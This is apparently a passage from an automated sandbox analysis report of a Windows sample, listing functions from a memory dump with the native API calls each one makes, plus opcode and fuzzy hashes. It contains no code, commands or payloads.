Instruction Fuzzy Hash: BED05B611510C056D72E6B1DAA61B253657BBC4714FB3480FE0070B7D7DB70CCD5955D

Uniqueness

Uniqueness Score: -1.00%

Function 72711746, Relevance: 3.2, APIs: 2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b929b91cc9a959dab96c980baa78c345694aa58a40e08e168a8a0cf46b71367b
Instruction ID: 7709c2bd7b2d2f54dbb094aee173f42b9354086b76d79ddc231e7c4693dbc985
Opcode Fuzzy Hash: b929b91cc9a959dab96c980baa78c345694aa58a40e08e168a8a0cf46b71367b
Instruction Fuzzy Hash: 3B816F75E0025A8FCB09CFACC680AECB7B2BF89324F149259D416AF3C8DB319945CB54

Uniqueness

Uniqueness Score: -1.00%

Function 7267B1C0, Relevance: 3.2, APIs: 2, Instructions: 173nativeCOMMON

Download Yara Rule

APIs

ZwTraceEvent.210A(?,00000300,00000078,?,00000000,?), ref: 7267B2F5
RtlNtStatusToDosError.210A(00000000,?,00000300,00000078,?,00000000,?), ref: 7267B311

Part of subcall function 7264CC90: DbgPrint.210A(RTL: RtlNtStatusToDosError(0x%lx): No Valid Win32 Error Mapping,?,?,?,-00000F38,00000000,?,?), ref: 726A5B5C
Part of subcall function 7264CC90: DbgPrint.210A(RTL: Edit ntos\rtl\generr.c to correct the problem,?,?,?,-00000F38,00000000,?,?), ref: 726A5B66
Part of subcall function 7264CC90: DbgPrint.210A(RTL: ERROR_MR_MID_NOT_FOUND is being returned,?,-00000F38,00000000,?,?), ref: 726A5B73

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Print$ErrorEventStatusTrace
String ID:
API String ID: 4205894102-0
Opcode ID: 379060c786f856bc67a921464706d8d2d2a0869aa92f4b75df7b01b8d04e31db
Instruction ID: e8bd27ab32ef5cde3361bd4027f89cb143228f000dfe80b6ed5831dbe94b94f7
Opcode Fuzzy Hash: 379060c786f856bc67a921464706d8d2d2a0869aa92f4b75df7b01b8d04e31db
Instruction Fuzzy Hash: F1619F31609382CBD706CF28C48079ABBF2BF95304F14495EE8969B381E774E994CB92

Uniqueness

Uniqueness Score: -1.00%

Function 7267C0D7, Relevance: 3.1, APIs: 2, Instructions: 137nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 7265BED4: RtlImageNtHeaderEx.210A(00000001,?,00000000,00000000,?,00000000,7265DBD8,?,?,?,?,7267A7FB,0000000C,?,FFFFFFFE,?), ref: 7265BF0D

RtlImageNtHeaderEx.210A(00000003,?,00000000,00000000,726CF60F,0000000C,?,?,00000000,00000001,00000000), ref: 7267C127
ZwProtectVirtualMemory.210A(000000FF,?,?,00000004,?,00000003,?,00000000,00000000,726CF60F,0000000C,?,?,00000000,00000001,00000000), ref: 7267C18C

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: HeaderImage$MemoryProtectVirtual
String ID:
API String ID: 1155039600-0
Opcode ID: ad09d155f9f0942f0bcc4dc800029ea430ad8f10fbfa5b16c7002ae59ae2bf53
Instruction ID: 0343cc601527755ccbc8e9adb1d9c1249063379a34c35e6f17c174b24da0daed
Opcode Fuzzy Hash: ad09d155f9f0942f0bcc4dc800029ea430ad8f10fbfa5b16c7002ae59ae2bf53
Instruction Fuzzy Hash: 63514F74B00616DFDB09CF9DD980AAAB7B5FF58724B10416AE906D7380EB30E950CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 7266C1F6, Relevance: 3.1, APIs: 2, Instructions: 102filenativeCOMMON

Download Yara Rule

APIs

ZwCreateFile.210A(00000000,80100080,00000018,?,00000000,00000000,00000005,00000001,00000000,00000000,00000000,?,02BE0000,00000000,00000000), ref: 7266C219
ZwCreateFile.210A(00000000,80100080,00000018,00000003,00000000,00000000,00000005,00000001,00000000,00000000,00000000,00000000,00000000,80100080,00000018,?), ref: 7266C2BC

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 4bcb4998e8fca8c87265123c9ba18bae5c5a1e8a4fd345a4291d0b2b09d550b7
Instruction ID: b82f59a7aef1667743635f6109fbdcba71c280f9ab7f4711267aacff1aadfb67
Opcode Fuzzy Hash: 4bcb4998e8fca8c87265123c9ba18bae5c5a1e8a4fd345a4291d0b2b09d550b7
Instruction Fuzzy Hash: 773182B1610581AFE3198B59C8DCFB637AEEB40B14F0540BAFC0ADB291E675EC01C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 72688284, Relevance: 3.1, APIs: 2, Instructions: 93nativethreadCOMMON

Download Yara Rule

APIs

ZwCreateThreadEx.210A(?,001FFFFF,00000018,?,?,?,?,00000000,00003000,00000004,?,?,00000000,00000000), ref: 72688342
ZwClose.210A(?,?,001FFFFF,00000018,?,?,?,?,00000000,00003000,00000004,?,?,00000000,00000000), ref: 726C0370

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CloseCreateThread
String ID:
API String ID: 562768112-0
Opcode ID: a9526689132a63a2815822053badb4459aad6456e7a1db12bb3c1690a5591ba8
Instruction ID: 285e21bfdd1f10a4a7b10058ce0dd2e4578a64423108c1e5c14e3a94ff86a19e
Opcode Fuzzy Hash: a9526689132a63a2815822053badb4459aad6456e7a1db12bb3c1690a5591ba8
Instruction Fuzzy Hash: 98314271E0420CAFDB16DF98D981BDEBBB5FF08724F10412AE91AA3280D734A855CB54

Uniqueness

Uniqueness Score: -1.00%

Function 72688375, Relevance: 3.1, APIs: 2, Instructions: 91memorynativeCOMMON

Download Yara Rule

APIs

ZwAllocateVirtualMemory.210A(000000FF,00000000,00000000,?,00002000,00000004,?,00000000,?,?), ref: 7268840A

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: fd126e3001a3ccd380ded2e3e2f1e278657f74f0cd8a032199346a4aefd66715
Instruction ID: d3b6d47ad5fc7ba251aa263dec51c0777aba7b1b85270052b05b216e7f2d8861
Opcode Fuzzy Hash: fd126e3001a3ccd380ded2e3e2f1e278657f74f0cd8a032199346a4aefd66715
Instruction Fuzzy Hash: B331D471B0461AABD71ADAA8C880B9DF7A5FB44B20F204227D52DD72C0DB70B99587D0

Uniqueness

Uniqueness Score: -1.00%

Function 7264E6A5, Relevance: 3.1, APIs: 2, Instructions: 91memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 7264E668: RtlAllocateHeap.210A(?,00000008,?,00000002,00000055,00000000,?,?,726FD0D4,00000000,00000000,?,?,00000000,00000000,?), ref: 7264E697

RtlGetParentLocaleName.210A(00000000,00000001,00000006,00000000,00000000,?,00000000), ref: 7264E6F9

Part of subcall function 7264E77E: RtlInitUnicodeString.210A(00000001,?,00000000,00000000,?,00000001,?,00000200,?,?,00000000), ref: 7264E79B
Part of subcall function 7264E77E: RtlCultureNameToLCID.210A(00000001,?,00000001,?,00000000,00000000,?,00000001,?,00000200,?,?,00000000), ref: 7264E7A8

RtlFreeHeap.210A(?,00000000,00000000,?,?,?,00000000,00000001,00000006,00000000,00000000,?,00000000), ref: 7264E739

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: HeapName$AllocateCultureFreeInitLocaleParentStringUnicode
String ID:
API String ID: 876478819-0
Opcode ID: 569cea5818d831021acb9a1065226c88e2b52555214c00d61607d0f4899cec5a
Instruction ID: 13c2a822046d8805142cb2adb7ee939a0b19a151eb074365a8fa1d3748561b43
Opcode Fuzzy Hash: 569cea5818d831021acb9a1065226c88e2b52555214c00d61607d0f4899cec5a
Instruction Fuzzy Hash: 1621F53AE0429BABCB059EA8C450BEFB779EF00714F01417B9E55AB281D6709E04C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 7267A570, Relevance: 3.1, APIs: 2, Instructions: 90nativeCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.210A(727385EC,7271FBF0,0000001C,72643095,?,00000000,00008000), ref: 7267A5C4
ZwClose.210A(?,7271FBF0,0000001C,72643095,?,00000000,00008000), ref: 726B9523

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AcquireCloseExclusiveLock
String ID:
API String ID: 1365838287-0
Opcode ID: b45c9dfd8a74525340efab6fb01af745d60a99344d1c80e4f869998ba2b76ba7
Instruction ID: a6a1d9f380834f2ebda8b24d7d7341f09fa1814480cccdd330d5726654fd7614
Opcode Fuzzy Hash: b45c9dfd8a74525340efab6fb01af745d60a99344d1c80e4f869998ba2b76ba7
Instruction Fuzzy Hash: D521AEB1901205DFEB15CF68D950B5ABBB5AF08324F20856BD952AB3C0D734DD42CF69

Uniqueness

Uniqueness Score: -1.00%

Function 726CA1AC, Relevance: 3.1, APIs: 2, Instructions: 75nativeCOMMON

Download Yara Rule

APIs

ZwCompareSigningLevels.210A(?,0000000C,?,00000000,00000000,?,?,?,726B313E,?,000000FF,00100021,00000018,?,00000005,00000060), ref: 726CA1E9
ZwCompareSigningLevels.210A(?,0000000C,00000024,?,00000000,?,00000000,00000000,?,?,?,726B313E,?,000000FF,00100021,00000018), ref: 726CA218

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CompareLevelsSigning
String ID:
API String ID: 1884971427-0
Opcode ID: d720aeefa583a28b810e12a3c871c11f523863abe0963a96b7d533f6384e705d
Instruction ID: c57b53682cde3985c8ec7596dfd7ea6097880b95632402f63c1c5944689f19d7
Opcode Fuzzy Hash: d720aeefa583a28b810e12a3c871c11f523863abe0963a96b7d533f6384e705d
Instruction Fuzzy Hash: A52107726002645FDB009F5DC884BA63AADEFC2208F1905BBAD469B2D9C679ED808350

Uniqueness

Uniqueness Score: -1.00%

Function 7267F56B, Relevance: 3.1, APIs: 2, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.210A(?,00000008,00000008,00000000,727384D8,00000001,?,?,?,726BB7E6,00000004,?,00000003,00000000,00000000,00000000), ref: 7267F597

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4406822d03671175a8ff063c6b3e5df6262df709431b4aaf67d3018e440b9bd0
Instruction ID: d4632a2601da4d95b9483422600b4ceed640a487889b0b5f620274c979de9c80
Opcode Fuzzy Hash: 4406822d03671175a8ff063c6b3e5df6262df709431b4aaf67d3018e440b9bd0
Instruction Fuzzy Hash: 93213872600645DBE7368F4DD640E56B7F5EBA4B10F21856FE84A8BB94DB31EC01DB80

Uniqueness

Uniqueness Score: -1.00%

Function 7267B320, Relevance: 3.1, APIs: 2, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.210A(72738608,00000000,00000000,00000000,?,?,7269DAC7,?), ref: 7267B335
RtlFreeHeap.210A(?,00000000,?,72738608,00000000,00000000,00000000,?,?,7269DAC7,?), ref: 7267B378

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AcquireExclusiveFreeHeapLock
String ID:
API String ID: 793958360-0
Opcode ID: 5f3152d55f1f98b047c4efd47b75571123d5608f6f0bab7479ee9ba558d84a5c
Instruction ID: d7860f3140f422830dc125191b1a80c7b23e669667718258e7d9843e5b88394b
Opcode Fuzzy Hash: 5f3152d55f1f98b047c4efd47b75571123d5608f6f0bab7479ee9ba558d84a5c
Instruction Fuzzy Hash: 14118833205110DBC70A8A2CDE80A2B73A7EFD5730F39012AD822873D1DA319C42C6D9

Uniqueness

Uniqueness Score: -1.00%

Function 72684290, Relevance: 3.1, APIs: 2, Instructions: 62nativeCOMMON

Download Yara Rule

APIs

ZwInitializeNlsFiles.210A(00000028,00000008,?,?,?,00000000,?,72684218,00000001,727365D4,72653AD9,?,00000008,00000028,?), ref: 726842BD
ZwUnmapViewOfSection.210A(000000FF,00000028,00000028,00000008,?,?,?,00000000,?,72684218,00000001,727365D4,72653AD9,?,00000008,00000028), ref: 726BDE23

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: FilesInitializeSectionUnmapView
String ID:
API String ID: 146624528-0
Opcode ID: 1906309b72a5e9abb3c80f5d61fd710f20ed6883e34a0c1a0925f5a192a099fa
Instruction ID: 104bfc4aaf3608cf2e6d970bb4ffd4c51c39c0c8d7c4b4f44a3ec9ad9e2c6b71
Opcode Fuzzy Hash: 1906309b72a5e9abb3c80f5d61fd710f20ed6883e34a0c1a0925f5a192a099fa
Instruction Fuzzy Hash: 9A115B3620A293EFC311CF1EC990B16B7E8FB59334B60442AE915DB746E774D851CB91

Uniqueness

Uniqueness Score: -1.00%

Function 7264B680, Relevance: 3.1, APIs: 2, Instructions: 62nativeCOMMONLIBRARYCODE

Download Yara Rule

APIs

ZwTraceEvent.210A(?,00000700,00000078,?,?,00000000), ref: 7264B6FC
RtlNtStatusToDosError.210A(00000000,?,00000700,00000078,?,?,00000000), ref: 7264B71C

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ErrorEventStatusTrace
String ID:
API String ID: 1132987938-0
Opcode ID: 86dd50bf70de8e4ebf9930c5f7f16f1a82c2ccccf288fa2e823f0499c112f5c7
Instruction ID: 800a000529dc914f565eeb01db14e63dc6375eb1e49029383e33f91ac81af899
Opcode Fuzzy Hash: 86dd50bf70de8e4ebf9930c5f7f16f1a82c2ccccf288fa2e823f0499c112f5c7
Instruction Fuzzy Hash: D8119432908B459FC715CF69C840B9B77E5AF89710F01492EFD99DB280EAB5E501CB92

Uniqueness

Uniqueness Score: -1.00%

Function 7264B61F, Relevance: 3.1, APIs: 2, Instructions: 60nativeCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.210A ref: 7264B63C

Part of subcall function 7265A050: RtlImageNtHeaderEx.210A(00000001,?,00000000,00000000,?,?,?,72671387,?,7271F938,00000050,726719D8,?,7266B333,00000000,00000000), ref: 7265A066

ZwQueryVirtualMemory.210A(000000FF,?,00000003,?,00000014,00000000), ref: 726A59ED

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: HeaderImage$MemoryQueryVirtual
String ID:
API String ID: 1743781004-0
Opcode ID: 7e1c7a2c56fb598a0b48602945a4474c0bd6536d7186e72d5d9e9157b24d60a5
Instruction ID: a29b18e2d829dcba1f67c072603a73f108f6f8bf6c4e02f18660676603ac1f24
Opcode Fuzzy Hash: 7e1c7a2c56fb598a0b48602945a4474c0bd6536d7186e72d5d9e9157b24d60a5
Instruction Fuzzy Hash: 78112632E042289BC7129ADCC850B9BB6B9DB84770F251263ED92973D5DA70DE0282D0

Uniqueness

Uniqueness Score: -1.00%

Function 7268C340, Relevance: 3.1, APIs: 2, Instructions: 57nativeCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlUnhandledExceptionFilter.210A(72621650,7268C327,7268C327,?,7269DE96,7264B16E,7271F198,00000090,7264B0FE,00000003,7268C327,0000000A,00000001,00000000,0000000A,7268C327), ref: 7268C445
ZwTerminateProcess.210A(000000FF,C0000409,72621650,7268C327,7268C327,?,7269DE96,7264B16E,7271F198,00000090,7264B0FE,00000003,7268C327,0000000A,00000001,00000000), ref: 7268C451

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExceptionFilterProcessTerminateUnhandled
String ID:
API String ID: 2272017760-0
Opcode ID: 2eda1a9c692b09cfa946766a862ceb1ebfd98b6a5db526636213697f8ffe4cba
Instruction ID: 7cccd55c2a65b3e01151fb29dc66d1c316ed113d3a39a80f66edadb6ad553f17
Opcode Fuzzy Hash: 2eda1a9c692b09cfa946766a862ceb1ebfd98b6a5db526636213697f8ffe4cba
Instruction Fuzzy Hash: 0F21BDB74D42829EE304CF1AD6C6B443FE4BB4C716FB4491EE9188F292E3B59881CB44

Uniqueness

Uniqueness Score: -1.00%

Function 726746A4, Relevance: 3.1, APIs: 2, Instructions: 56nativeCOMMON

Download Yara Rule

APIs

RtlRandomEx.210A(727384B8,000000FF,00000024,727384B8,00000004,00000000,?,00000018,?,?,?,726A3640), ref: 726746C0
ZwQueryInformationProcess.210A(000000FF,00000024,727384B8,00000004,00000000,?,00000018,?,?,?,726A3640), ref: 726B56F6

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: InformationProcessQueryRandom
String ID:
API String ID: 3964881495-0
Opcode ID: 4d45f54cdc22f18e7744879519bdaec812cd6bd5e6bc9a1508c0a9927569a01f
Instruction ID: ae5b47c61e21df5c7498131429d416bbcb27fa15ee4efae89dfc7095a2edb1df
Opcode Fuzzy Hash: 4d45f54cdc22f18e7744879519bdaec812cd6bd5e6bc9a1508c0a9927569a01f
Instruction Fuzzy Hash: 66112633700104DBD719CA5EDD80B85B7BADB853A4F34416AFA15AB7D9D6389D01C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 72648670, Relevance: 3.1, APIs: 2, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.210A(?,00000008,?), ref: 726486A2
memcpy.210A(00000018,?,-00000008,?), ref: 726486D4

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AllocateHeapmemcpy
String ID:
API String ID: 1925790395-0
Opcode ID: 4553397d633c131b0df30516b72acc394f92672717925705c3e19a94c67a474d
Instruction ID: 207194c434b7906880ba2c93c16694200bd1458e43ceb0a8b85d6a67ff199db7
Opcode Fuzzy Hash: 4553397d633c131b0df30516b72acc394f92672717925705c3e19a94c67a474d
Instruction Fuzzy Hash: 7A11ED31905B119BC7628F19DC40A227BF5FB45B21B20892EF8DACB2C0DF30D611CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 726870AB, Relevance: 3.0, APIs: 2, Instructions: 47nativetimeCOMMON

Download Yara Rule

APIs

ZwCancelWaitCompletionPacket.210A(?,00000000,?,00000003,?,?,?,7266E777,?,?,00000003,?), ref: 726870C8
RtlDebugPrintTimes.210A(?,?,00000000,?,00000003,?,?,?,7266E777,?,?,00000003,?), ref: 726BFCC1

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CancelCompletionDebugPacketPrintTimesWait
String ID:
API String ID: 225483473-0
Opcode ID: 34a36284dae0127a70b3474b64ce83ffb15ed0e979263d550d1e9917882739f4
Instruction ID: c60b1cb78975f046469f827a4f8f4217ba0465ab68509196d6ad89d07482f975
Opcode Fuzzy Hash: 34a36284dae0127a70b3474b64ce83ffb15ed0e979263d550d1e9917882739f4
Instruction Fuzzy Hash: 4401F736200509ABD70A4B2DC805BAFF7A8EF85325F200A1AE416831D1DBB9AC51C794

Uniqueness

Uniqueness Score: -1.00%

Function 72718356, Relevance: 3.0, APIs: 2, Instructions: 46nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A(00000000,?), ref: 72718392
ZwTraceEvent.210A(?,00000403,00000018,?,00000000,?), ref: 727183BF

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: 3a2f6b75b23b78c6c8cd235b4170adec91dc02e0c1e3d380d3d7a13d076cc43a
Instruction ID: 96ceb5af6a553ee6e438a5e4b7f0d2d91e9b4ac34891562834e9c65461455732
Opcode Fuzzy Hash: 3a2f6b75b23b78c6c8cd235b4170adec91dc02e0c1e3d380d3d7a13d076cc43a
Instruction Fuzzy Hash: 1F0129B5A00209ABDB04CFA9D9419EEBBB8FF48700F10445AE901E7380D7749A11CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 727183D7, Relevance: 3.0, APIs: 2, Instructions: 44nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A(?,?,7FFE0386,?,?,?,?,?,?,?,?,?,?,?,726A282C,?), ref: 7271840D
ZwTraceEvent.210A(?,00000403,00000014,?,?,?,7FFE0386), ref: 7271843A

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
